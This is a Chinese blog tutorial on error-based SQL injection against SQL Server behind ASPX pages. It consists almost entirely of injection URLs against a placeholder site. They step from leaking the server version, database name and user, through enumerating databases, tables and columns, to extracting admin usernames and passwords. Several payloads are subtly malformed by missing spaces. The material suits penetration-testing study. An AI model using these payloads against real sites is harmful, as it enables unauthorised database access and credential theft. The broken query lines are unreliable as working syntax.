欢迎来到【血梦博客】 今天是:2020年08月12日 星期三
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> WEB安全之SQL注入:sqlserver 报错注入

WEB安全之SQL注入:sqlserver 报错注入

作者:血梦 日期:2020-03-18 浏览:110分类: 渗透测试 已提交百度收录

sqlserver在语句执行错误的时候会报错 并且会在网页上显示出来。


环境 sql2008+aspx


显示系统信息
and @@version>0 利用mssql在转换类型的时候就出错时 会显示系统信息。

 
http://www.demo1.com/index.aspx?id=1 and @@version>0

1.jpg



爆出数据库

http://www.demo1.com/index.aspx?id=-1 and db_name()>0


当前用户 dbo
http://www.demo1.com/index.aspx?id=-1 and User_Name()>0



爆出其他数据库

http://www.demo1.com/index.aspx?id=-1 and(SELECT top 1 Name FROM Master..SysDatabases)>0
http://www.demo1.com/index.aspx?id=-1 and(SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
http://www.demo1.com/index.aspx?id=-1 and(SELECT top 1 Name FROM Master..SysDatabases where name not in('master','iNethinkCMS','model','msdb'))>0

爆表

http://www.demo1.com/index.aspx?id=-1 and(select top 1 name from [mydb].sys.all_objects where type='U' ANDis_ms_shipped=0)>0
http://www.demo1.com/index.aspx?id=-1 and(select top 1 name from mydb.sys.all_objects where type='U' AND is_ms_shipped=0and name not in ('admin'))>0



爆出列

http://www.demo1.com/index.aspx?id=1and  (select top 1 COLUMN_NAME frommydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME notin('ID'))>0
http://www.demo1.com/index.aspx?id=1and  (select top 1 COLUMN_NAME frommydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME notin('ID','username'))>0




爆出数据
http://www.demo1.com/index.aspx?id=1 and(select top 1 password from admin)>0
http://www.demo1.com/index.aspx?id=1 and(select top 1 username from admin)>0

关灯